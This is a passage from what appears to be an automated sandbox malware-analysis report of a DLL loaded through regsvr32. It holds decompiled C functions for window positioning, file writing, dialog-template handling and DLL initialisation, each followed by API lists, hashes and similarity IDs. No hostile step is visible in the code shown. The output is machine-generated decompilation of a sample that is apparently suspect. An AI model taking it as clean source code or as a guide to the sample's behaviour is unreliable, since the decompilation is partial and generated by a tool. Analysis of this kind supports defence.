                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFileLastRead
                                                                        • String ID:
                                                                        • API String ID: 1948546556-0
                                                                        • Opcode ID: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
                                                                        • Instruction ID: 3bbfbaef22ec515d269d62fd47d355a82d48074a4c8ee7a64ff4f0343116150f
                                                                        • Opcode Fuzzy Hash: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
                                                                        • Instruction Fuzzy Hash: DB61D374A04B89DFDB21CFA8C880B997BF0EF05354F158099E9618F2A2D770DAC1CB11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 63%
                                                                        			E1000E58F(void* __ecx, void* __edx) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				void* _v16;
                                                                        				void* _v20;
                                                                        				intOrPtr _v24;
                                                                        				struct tagRECT _v40;
                                                                        				struct tagRECT _v56;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed int _t58;
                                                                        				intOrPtr _t60;
                                                                        				intOrPtr* _t62;
                                                                        				intOrPtr* _t65;
                                                                        				intOrPtr _t66;
                                                                        				intOrPtr* _t67;
                                                                        				intOrPtr* _t69;
                                                                        				intOrPtr* _t71;
                                                                        				intOrPtr* _t73;
                                                                        				intOrPtr* _t84;
                                                                        				void* _t107;
                                                                        				void* _t126;
                                                                        				intOrPtr _t130;
                                                                        				intOrPtr* _t131;
                                                                        				intOrPtr* _t133;
                                                                        				intOrPtr* _t134;
                                                                        				void* _t135;
                                                                        				intOrPtr _t136;
                                                                        				void* _t137;
                                                                        
                                                                        				_t126 = __edx;
                                                                        				_t135 = __ecx;
                                                                        				_t130 = E10023092( *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 0x24)));
                                                                        				_v12 = _t130;
                                                                        				_t58 = IsWindowVisible( *(_t130 + 0x1c));
                                                                        				asm("sbb eax, eax");
                                                                        				_t60 =  ~_t58 + 1;
                                                                        				_v24 = _t60;
                                                                        				_t107 = 0;
                                                                        				if(_t60 != 0) {
                                                                        					GetWindowRect( *(E100220EE(_t137, GetDesktopWindow()) + 0x1c),  &_v56);
                                                                        					GetWindowRect( *(_t130 + 0x1c),  &_v40);
                                                                        					asm("cdq");
                                                                        					asm("cdq");
                                                                        					E1002036F(_t130, _v56.right - _v56.left - _t126 >> 1, _v56.bottom - _v56.top - _t126 >> 1, _t107, _t107, _t107);
                                                                        					E100203AD(_t130, 1);
                                                                        				}
                                                                        				_t62 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
                                                                        				_t131 = _t135 + 0x48;
                                                                        				_push(_t131);
                                                                        				_push(0x100405f8);
                                                                        				_push(_t62);
                                                                        				if( *((intOrPtr*)( *_t62))() < 0) {
                                                                        					_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 4)) + 0x4c));
                                                                        					_t66 =  *((intOrPtr*)( *_t65))(_t65, 0x10040550,  &_v16);
                                                                        					if(_t66 >= _t107) {
                                                                        						_t67 = _v16;
                                                                        						 *((intOrPtr*)( *_t67 + 0x14))(_t67,  &_v20);
                                                                        						_t69 = _v16;
                                                                        						 *((intOrPtr*)( *_t69 + 8))(_t69);
                                                                        						_t71 = _v20;
                                                                        						if(_t71 != _t107) {
                                                                        							_t133 = _t135 + 8;
                                                                        							_v8 =  *((intOrPtr*)( *_t71))(_t71, 0x10042ff8, _t133);
                                                                        							_t73 = _v20;
                                                                        							 *((intOrPtr*)( *_t73 + 8))(_t73);
                                                                        							_t66 = _v8;
                                                                        							if(_t66 >= _t107) {
                                                                        								_t134 =  *_t133;
                                                                        								 *((intOrPtr*)( *_t134))(_t134, 0x10042fe8, _t135 + 0xc);
                                                                        								goto L14;
                                                                        							}
                                                                        						} else {
                                                                        							_t66 = 0x80004005;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t84 =  *_t131;
                                                                        					_t134 = _t135 + 0x4c;
                                                                        					_v8 =  *((intOrPtr*)( *_t84 + 0xc))(_t84, _t107, 0x10043298, _t134);
                                                                        					if( *_t134 == _t107) {
                                                                        						_v8 = 0x80004003;
                                                                        					}
                                                                        					if(_v8 >= _t107) {
                                                                        						L14:
                                                                        						_t136 = E1000E14F(_t107, _t135, _t134, _t135);
                                                                        						if(_v24 != _t107) {
                                                                        							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
                                                                        							E100203AD(_v12, _t107);
                                                                        						}
                                                                        						_t66 = _t136;
                                                                        					} else {
                                                                        						if(_v24 != _t107) {
                                                                        							E1002036F(_v12, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, _t107);
                                                                        							E100203AD(_v12, _t107);
                                                                        						}
                                                                        						_t66 = _v8;
                                                                        					}
                                                                        				}
                                                                        				return _t66;
                                                                        			}

                                                                        APIs
                                                                        • IsWindowVisible.USER32 ref: 1000E5AD
                                                                        • GetDesktopWindow.USER32 ref: 1000E5C0
                                                                        • GetWindowRect.USER32 ref: 1000E5D3
                                                                        • GetWindowRect.USER32 ref: 1000E5E0
                                                                          • Part of subcall function 1002036F: MoveWindow.USER32(?,?,?,00000000,?,00000000,?,1000E721,?,?), ref: 1002038A
                                                                          • Part of subcall function 100203AD: ShowWindow.USER32(?,?,1000E72A,00000000,?,?), ref: 100203BA
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$DesktopMoveShowVisible
                                                                        • String ID:
                                                                        • API String ID: 3835705305-0
                                                                        • Opcode ID: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
                                                                        • Instruction ID: 525efb47f72b729c7b32d6b473f79529eff02a82a59350a91d8b9bca58045246
                                                                        • Opcode Fuzzy Hash: deebbd18c64334d53d6a070cc2f7cf5956eb5d0ae01d3c8a610755a7333daa4e
                                                                        • Instruction Fuzzy Hash: F351D875A0020AAFDB00DFA8DD84CAEB7BAFF48345B154459F646E7255CB31BE41CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E100197AB(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                        				intOrPtr _t68;
                                                                        				void** _t73;
                                                                        				signed int _t74;
                                                                        				long _t76;
                                                                        				intOrPtr _t79;
                                                                        				signed int _t81;
                                                                        				char* _t86;
                                                                        				int _t91;
                                                                        				long _t93;
                                                                        				intOrPtr* _t100;
                                                                        				void* _t102;
                                                                        				signed int _t107;
                                                                        				char _t110;
                                                                        				struct _OVERLAPPED* _t112;
                                                                        				long _t115;
                                                                        				signed int _t118;
                                                                        				struct _OVERLAPPED* _t120;
                                                                        				void* _t121;
                                                                        				void* _t123;
                                                                        
                                                                        				_t121 = _t123 - 0x3a0;
                                                                        				_t68 =  *0x1004c470; // 0x303bb91f
                                                                        				_t112 = 0;
                                                                        				 *((intOrPtr*)(_t121 + 0x39c)) = _t68;
                                                                        				 *(_t121 - 0x78) = 0;
                                                                        				 *((intOrPtr*)(_t121 - 0x7c)) = 0;
                                                                        				if( *(_t121 + 0x3b0) != 0) {
                                                                        					_t100 = 0x1004f920 + ( *(_t121 + 0x3a8) >> 5) * 4;
                                                                        					_t118 = ( *(_t121 + 0x3a8) & 0x0000001f) + ( *(_t121 + 0x3a8) & 0x0000001f) * 8 << 2;
                                                                        					__eflags =  *( *_t100 + _t118 + 4) & 0x00000020;
                                                                        					if(__eflags != 0) {
                                                                        						E1001B190(_t102, __eflags,  *(_t121 + 0x3a8), 0, 0, 2);
                                                                        					}
                                                                        					_t73 =  *_t100 + _t118;
                                                                        					__eflags = _t73[1] & 0x00000080;
                                                                        					if((_t73[1] & 0x00000080) == 0) {
                                                                        						_t74 = WriteFile( *_t73,  *(_t121 + 0x3ac),  *(_t121 + 0x3b0), _t121 - 0x80, _t112);
                                                                        						__eflags = _t74;
                                                                        						if(_t74 == 0) {
                                                                        							 *(_t121 - 0x6c) = GetLastError();
                                                                        						} else {
                                                                        							 *(_t121 - 0x6c) = _t112;
                                                                        							 *(_t121 - 0x78) =  *(_t121 - 0x80);
                                                                        						}
                                                                        					} else {
                                                                        						__eflags =  *(_t121 + 0x3b0) - _t112;
                                                                        						 *(_t121 - 0x74) =  *(_t121 + 0x3ac);
                                                                        						 *(_t121 - 0x6c) = _t112;
                                                                        						if( *(_t121 + 0x3b0) <= _t112) {
                                                                        							L25:
                                                                        							_t79 =  *_t100;
                                                                        							__eflags =  *(_t79 + _t118 + 4) & 0x00000040;
                                                                        							if(( *(_t79 + _t118 + 4) & 0x00000040) == 0) {
                                                                        								L28:
                                                                        								 *((intOrPtr*)(E100136F5())) = 0x1c;
                                                                        								_t81 = E100136FE();
                                                                        								 *_t81 = _t112;
                                                                        								L29:
                                                                        								_t77 = _t81 | 0xffffffff;
                                                                        								L31:
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags =  *( *(_t121 + 0x3ac)) - 0x1a;
                                                                        							if( *( *(_t121 + 0x3ac)) != 0x1a) {
                                                                        								goto L28;
                                                                        							}
                                                                        							_t77 = 0;
                                                                        							goto L31;
                                                                        						} else {
                                                                        							goto L6;
                                                                        						}
                                                                        						do {
                                                                        							L6:
                                                                        							_t107 =  *(_t121 - 0x74) -  *(_t121 + 0x3ac);
                                                                        							__eflags = _t107;
                                                                        							_t86 = _t121 - 0x68;
                                                                        							 *(_t121 - 0x70) = _t112;
                                                                        							do {
                                                                        								__eflags = _t107 -  *(_t121 + 0x3b0);
                                                                        								if(_t107 >=  *(_t121 + 0x3b0)) {
                                                                        									break;
                                                                        								}
                                                                        								 *(_t121 - 0x74) =  *(_t121 - 0x74) + 1;
                                                                        								_t110 =  *( *(_t121 - 0x74));
                                                                        								_t107 = _t107 + 1;
                                                                        								__eflags = _t110 - 0xa;
                                                                        								if(_t110 == 0xa) {
                                                                        									 *((intOrPtr*)(_t121 - 0x7c)) =  *((intOrPtr*)(_t121 - 0x7c)) + 1;
                                                                        									 *_t86 = 0xd;
                                                                        									_t86 = _t86 + 1;
                                                                        									_t34 = _t121 - 0x70;
                                                                        									 *_t34 =  &( *(_t121 - 0x70)->Internal);
                                                                        									__eflags =  *_t34;
                                                                        								}
                                                                        								 *_t86 = _t110;
                                                                        								_t86 = _t86 + 1;
                                                                        								 *(_t121 - 0x70) =  &( *(_t121 - 0x70)->Internal);
                                                                        								__eflags =  *(_t121 - 0x70) - 0x400;
                                                                        							} while ( *(_t121 - 0x70) < 0x400);
                                                                        							_t115 = _t86 - _t121 - 0x68;
                                                                        							_t91 = WriteFile( *( *_t100 + _t118), _t121 - 0x68, _t115, _t121 - 0x80, 0);
                                                                        							__eflags = _t91;
                                                                        							if(_t91 == 0) {
                                                                        								 *(_t121 - 0x6c) = GetLastError();
                                                                        								L16:
                                                                        								_t112 = 0;
                                                                        								__eflags = 0;
                                                                        								L17:
                                                                        								_t76 =  *(_t121 - 0x78);
                                                                        								__eflags = _t76 - _t112;
                                                                        								if(_t76 != _t112) {
                                                                        									_t77 = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
                                                                        									__eflags = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
                                                                        									goto L31;
                                                                        								}
                                                                        								__eflags =  *(_t121 - 0x6c) - _t112;
                                                                        								if( *(_t121 - 0x6c) == _t112) {
                                                                        									goto L25;
                                                                        								}
                                                                        								_t120 = 5;
                                                                        								__eflags =  *(_t121 - 0x6c) - _t120;
                                                                        								if( *(_t121 - 0x6c) != _t120) {
                                                                        									_t81 = E10013707( *(_t121 - 0x6c));
                                                                        								} else {
                                                                        									 *((intOrPtr*)(E100136F5())) = 9;
                                                                        									_t81 = E100136FE();
                                                                        									 *_t81 = _t120;
                                                                        								}
                                                                        								goto L29;
                                                                        							}
                                                                        							_t93 =  *(_t121 - 0x80);
                                                                        							 *(_t121 - 0x78) =  *(_t121 - 0x78) + _t93;
                                                                        							__eflags = _t93 - _t115;
                                                                        							if(_t93 < _t115) {
                                                                        								goto L16;
                                                                        							}
                                                                        							_t112 = 0;
                                                                        							__eflags =  *(_t121 - 0x74) -  *(_t121 + 0x3ac) -  *(_t121 + 0x3b0);
                                                                        						} while ( *(_t121 - 0x74) -  *(_t121 + 0x3ac) <  *(_t121 + 0x3b0));
                                                                        					}
                                                                        					goto L17;
                                                                        				} else {
                                                                        					_t77 = 0;
                                                                        					L32:
                                                                        					return E100117AE(_t77,  *((intOrPtr*)(_t121 + 0x39c)));
                                                                        				}
                                                                        			}























                                                                        APIs
                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,1004C878,00000001), ref: 10019893
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
                                                                        • Instruction ID: bcb25415e8510b231303bc6364b9eff1bf1e0548ad7273a78b3d91e774eab1a2
                                                                        • Opcode Fuzzy Hash: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
                                                                        • Instruction Fuzzy Hash: AD513671900298DFDB22CFA9C880ADDBBF8FF46744F21411AE9599F256DB309A81CF11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E1003078E(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				char _v12;
                                                                        				struct tagRECT _v28;
                                                                        				struct tagRECT _v44;
                                                                        				struct tagRECT _v60;
                                                                        				void* _t76;
                                                                        				int _t78;
                                                                        				intOrPtr _t83;
                                                                        				intOrPtr _t102;
                                                                        				int _t116;
                                                                        				void* _t124;
                                                                        				void* _t128;
                                                                        				intOrPtr _t133;
                                                                        				void* _t135;
                                                                        				void* _t139;
                                                                        
                                                                        				_t135 = __edi;
                                                                        				_t124 = __ecx;
                                                                        				_t76 = _a4 -  *((intOrPtr*)(__ecx + 4));
                                                                        				_t128 = _a8 -  *((intOrPtr*)(__ecx + 8));
                                                                        				_t133 =  *((intOrPtr*)(__ecx + 0x8c));
                                                                        				_t139 = 2;
                                                                        				if(_t133 == 0xa) {
                                                                        					L7:
                                                                        					 *((intOrPtr*)(_t124 + 0x28)) =  *((intOrPtr*)(_t124 + 0x28)) + _t76;
                                                                        					L9:
                                                                        					_t78 =  *((intOrPtr*)(_t124 + 0x30)) -  *((intOrPtr*)(_t124 + 0x28));
                                                                        					__eflags = _t78;
                                                                        					L10:
                                                                        					if(_t78 < 0) {
                                                                        						_t78 = 0;
                                                                        					}
                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t124 + 0x68)))) + 0x134))( &_v12, _t78, _t139, _t135);
                                                                        					GetWindowRect(GetDesktopWindow(),  &_v44);
                                                                        					_t83 =  *((intOrPtr*)(_t124 + 0x8c));
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					if(_t83 == 0xa || _t83 == 0xc) {
                                                                        						_v28.left = _v28.right -  *((intOrPtr*)(_t124 + 0x60)) - _v12 +  *((intOrPtr*)(_t124 + 0x58));
                                                                        						_v28.top =  *((intOrPtr*)(_t124 + 0x5c)) -  *((intOrPtr*)(_t124 + 0x64)) - _v8 + _v28.bottom;
                                                                        						__eflags = IntersectRect( &_v60,  &_v44,  &_v28);
                                                                        						if(__eflags != 0) {
                                                                        							 *((intOrPtr*)(_t124 + 0x38)) =  *((intOrPtr*)(_t124 + 0x40)) - _v12;
                                                                        							_t102 =  *((intOrPtr*)(_t124 + 0x44)) - _v8;
                                                                        							__eflags = _t102;
                                                                        							 *((intOrPtr*)(_t124 + 0x3c)) = _t102;
                                                                        							 *(_t124 + 0x48) = _v28.left;
                                                                        							 *((intOrPtr*)(_t124 + 0x4c)) = _v28.top;
                                                                        						}
                                                                        					} else {
                                                                        						_v28.right =  *((intOrPtr*)(_t124 + 0x60)) -  *((intOrPtr*)(_t124 + 0x58)) + _v28.left + _v12;
                                                                        						_v28.bottom =  *((intOrPtr*)(_t124 + 0x64)) -  *((intOrPtr*)(_t124 + 0x5c)) + _v28.top + _v8;
                                                                        						_t116 = IntersectRect( &_v60,  &_v44,  &_v28);
                                                                        						_t149 = _t116;
                                                                        						if(_t116 != 0) {
                                                                        							 *((intOrPtr*)(_t124 + 0x40)) =  *((intOrPtr*)(_t124 + 0x38)) + _v12;
                                                                        							 *((intOrPtr*)(_t124 + 0x44)) =  *((intOrPtr*)(_t124 + 0x3c)) + _v8;
                                                                        							 *((intOrPtr*)(_t124 + 0x50)) = _v28.right;
                                                                        							 *((intOrPtr*)(_t124 + 0x54)) = _v28.bottom;
                                                                        						}
                                                                        					}
                                                                        					 *((intOrPtr*)(_t124 + 4)) = _a4;
                                                                        					 *((intOrPtr*)(_t124 + 8)) = _a8;
                                                                        					return E10030582(_t124, _t149, 0);
                                                                        				}
                                                                        				if(_t133 == 0xb) {
                                                                        					__eflags = _t133 - 0xa;
                                                                        					if(_t133 != 0xa) {
                                                                        						_t14 = __ecx + 0x30;
                                                                        						 *_t14 =  *((intOrPtr*)(__ecx + 0x30)) + _t76;
                                                                        						__eflags =  *_t14;
                                                                        						goto L9;
                                                                        					}
                                                                        					goto L7;
                                                                        				} else {
                                                                        					_t139 = 0x22;
                                                                        					if(_t133 != 0xc) {
                                                                        						_t8 = __ecx + 0x34;
                                                                        						 *_t8 =  *((intOrPtr*)(__ecx + 0x34)) + _t128;
                                                                        						__eflags =  *_t8;
                                                                        					} else {
                                                                        						 *((intOrPtr*)(__ecx + 0x2c)) =  *((intOrPtr*)(__ecx + 0x2c)) + _t128;
                                                                        					}
                                                                        					_t78 =  *((intOrPtr*)(_t124 + 0x34)) -  *((intOrPtr*)(_t124 + 0x2c));
                                                                        					goto L10;
                                                                        				}
                                                                        			}



















                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$IntersectWindow$Desktop
                                                                        • String ID:
                                                                        • API String ID: 123605412-0
                                                                        • Opcode ID: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
                                                                        • Instruction ID: 610273ea94d3692e70733b76c969e3fbb3ef96a28992a3e324fe7b4179401a7e
                                                                        • Opcode Fuzzy Hash: 798443665cb7e1b579a2a184bcc2e050a0f8e43ff96723420b6623ef63c5f40a
                                                                        • Instruction Fuzzy Hash: D2516076A012099FCB45DFACC5D5A9E7BF8FF08355F148195E905EB20AE630E980CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10024838(void* __ebx, void** __ecx, void* __edi, void* __esi, char* _a4, short _a8) {
                                                                        				intOrPtr _v8;
                                                                        				short _v72;
                                                                        				signed int _v76;
                                                                        				signed int _v80;
                                                                        				void** _v84;
                                                                        				signed int _v88;
                                                                        				intOrPtr _t52;
                                                                        				short* _t65;
                                                                        				void* _t74;
                                                                        				short* _t81;
                                                                        				void* _t86;
                                                                        				char* _t92;
                                                                        				signed int _t93;
                                                                        				signed int* _t95;
                                                                        				void** _t96;
                                                                        				signed int _t101;
                                                                        				signed int _t103;
                                                                        				void* _t106;
                                                                        
                                                                        				_t52 =  *0x1004c470; // 0x303bb91f
                                                                        				_v8 = _t52;
                                                                        				_v84 = __ecx;
                                                                        				if(__ecx[1] != 0) {
                                                                        					_t95 = GlobalLock( *__ecx);
                                                                        					_v80 = 0 | _t95[0] == 0x0000ffff;
                                                                        					_v76 = E100246AB(_t95);
                                                                        					_t101 = (0 | _v80 != 0x00000000) + (0 | _v80 != 0x00000000) + 1 << 1;
                                                                        					_v88 = _t101;
                                                                        					if(_v80 == 0) {
                                                                        						 *_t95 =  *_t95 | 0x00000040;
                                                                        					} else {
                                                                        						_t95[3] = _t95[3] | 0x00000040;
                                                                        					}
                                                                        					if(lstrlenA(_a4) < 0x20) {
                                                                        						_a4 = _t101 + MultiByteToWideChar(0, 0, _a4, 0xffffffff,  &_v72, 0x20) * 2;
                                                                        						_t65 = E1002472A(_t95);
                                                                        						_t86 = 0;
                                                                        						_t81 = _t65;
                                                                        						if(_v76 != 0) {
                                                                        							_t86 = _t101 + 2 + E100124FC(_t81 + _t101) * 2;
                                                                        						}
                                                                        						_t92 = _a4;
                                                                        						_t31 = _t81 + 3; // 0x3
                                                                        						_t33 = _t92 + 3; // 0x3
                                                                        						_t67 = _t86 + _t31 & 0xfffffffc;
                                                                        						_t103 = _t81 + _t33 & 0xfffffffc;
                                                                        						_v76 = _t86 + _t31 & 0xfffffffc;
                                                                        						if(_v80 == 0) {
                                                                        							_t93 = _t95[2];
                                                                        						} else {
                                                                        							_t93 = _t95[4];
                                                                        						}
                                                                        						if(_a4 != _t86 && _t93 > 0) {
                                                                        							E100118B0(_t103, _t67, _t95 - _t67 + _v84[1]);
                                                                        							_t106 = _t106 + 0xc;
                                                                        						}
                                                                        						 *_t81 = _a8;
                                                                        						E100118B0(_t81 + _v88,  &_v72, _a4 - _v88);
                                                                        						_t96 = _v84;
                                                                        						_t96[1] = _t96[1] + _t103 - _v76;
                                                                        						GlobalUnlock( *_t96);
                                                                        						_t96[2] = _t96[2] & 0x00000000;
                                                                        						_t74 = 1;
                                                                        					} else {
                                                                        						_t74 = 0;
                                                                        					}
                                                                        				} else {
                                                                        					_t74 = 0;
                                                                        				}
                                                                        				return E100117AE(_t74, _v8);
                                                                        			}






















                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalLocklstrlen
                                                                        • String ID:
                                                                        • API String ID: 1144527523-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E1001119B(void* __ebx, void* __ecx, void* __edi, long* _a8) {
                                                                        				void* _v8;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				long* _t9;
                                                                        				long* _t11;
                                                                        				long _t17;
                                                                        				signed int _t25;
                                                                        				long* _t33;
                                                                        				long* _t36;
                                                                        				long* _t38;
                                                                        				long* _t39;
                                                                        				long _t47;
                                                                        				long _t50;
                                                                        				void* _t52;
                                                                        				long* _t53;
                                                                        				struct _OSVERSIONINFOA* _t54;
                                                                        				signed int _t56;
                                                                        				struct _OSVERSIONINFOA* _t58;
                                                                        
                                                                        				_t9 = _a8;
                                                                        				if(_t9 != 1) {
                                                                        					__eflags = _t9;
                                                                        					if(_t9 != 0) {
                                                                        						__eflags = _t9 - 2;
                                                                        						if(__eflags != 0) {
                                                                        							__eflags = _t9 - 3;
                                                                        							if(_t9 == 3) {
                                                                        								E10015355(0);
                                                                        							}
                                                                        							L27:
                                                                        							_t11 = 1;
                                                                        							__eflags = 1;
                                                                        							L28:
                                                                        							return _t11;
                                                                        						}
                                                                        						_push(0x8c);
                                                                        						_push(1);
                                                                        						_t53 = E1001382A(__ebx, __edi, _t52, __eflags);
                                                                        						__eflags = _t53;
                                                                        						if(_t53 == 0) {
                                                                        							L24:
                                                                        							_t11 = 0;
                                                                        							goto L28;
                                                                        						}
                                                                        						__eflags =  *0x1004f5e4( *0x1004c848, _t53);
                                                                        						_push(_t53);
                                                                        						if(__eflags == 0) {
                                                                        							E100107C8(__ebx, __edi, _t53, __eflags);
                                                                        							goto L24;
                                                                        						}
                                                                        						E1001518A();
                                                                        						_t17 = GetCurrentThreadId();
                                                                        						_t53[1] = _t53[1] | 0xffffffff;
                                                                        						 *_t53 = _t17;
                                                                        						goto L27;
                                                                        					}
                                                                        					__eflags =  *0x1004f3c8 - _t9; // 0x0
                                                                        					if(__eflags <= 0) {
                                                                        						goto L24;
                                                                        					}
                                                                        					 *0x1004f3c8 =  *0x1004f3c8 - 1;
                                                                        					__eflags =  *0x1004f41c - _t9; // 0x1
                                                                        					if(__eflags == 0) {
                                                                        						E10011F67();
                                                                        					}
                                                                        					E1001634A();
                                                                        					E1001516D();
                                                                        					E10013AD4();
                                                                        					goto L27;
                                                                        				}
                                                                        				E10010B20(0x94, __ecx);
                                                                        				_t54 = _t58;
                                                                        				_t54->dwOSVersionInfoSize = 0x94;
                                                                        				if(GetVersionExA(_t54) == 0) {
                                                                        					goto L24;
                                                                        				}
                                                                        				_t47 = _t54->dwPlatformId;
                                                                        				 *0x1004f3e0 = _t47;
                                                                        				_t25 = _t54->dwMajorVersion;
                                                                        				 *0x1004f3ec = _t25;
                                                                        				_t50 = _t54->dwMinorVersion;
                                                                        				 *0x1004f3f0 = _t50;
                                                                        				_t56 = _t54->dwBuildNumber & 0x00007fff;
                                                                        				 *0x1004f3e4 = _t56;
                                                                        				if(_t47 != 2) {
                                                                        					 *0x1004f3e4 = _t56 | 0x00008000;
                                                                        				}
                                                                        				 *0x1004f3e8 = (_t25 << 8) + _t50;
                                                                        				if(E10013A83(1) != 0) {
                                                                        					if(E10015384() != 0) {
                                                                        						E1001678D(__eflags);
                                                                        						 *0x10050cb0 = GetCommandLineA();
                                                                        						 *0x1004f3cc = E1001666B();
                                                                        						_t33 = E1001614C();
                                                                        						__eflags = _t33;
                                                                        						if(_t33 < 0) {
                                                                        							L13:
                                                                        							E1001516D();
                                                                        							goto L6;
                                                                        						}
                                                                        						_t36 = E100165C9();
                                                                        						__eflags = _t36;
                                                                        						if(_t36 < 0) {
                                                                        							L12:
                                                                        							E1001634A();
                                                                        							goto L13;
                                                                        						}
                                                                        						_t38 = E10016396();
                                                                        						__eflags = _t38;
                                                                        						if(_t38 < 0) {
                                                                        							goto L12;
                                                                        						}
                                                                        						_t39 = E10011E29(0);
                                                                        						__eflags = _t39;
                                                                        						if(_t39 != 0) {
                                                                        							goto L12;
                                                                        						}
                                                                        						 *0x1004f3c8 =  *0x1004f3c8 + 1;
                                                                        						goto L27;
                                                                        					}
                                                                        					L6:
                                                                        					E10013AD4();
                                                                        				}
                                                                        			}






















                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 100111BE
                                                                        • GetCommandLineA.KERNEL32(?,?,?,10011379,?,?,?,10041D40,0000000C), ref: 10011238
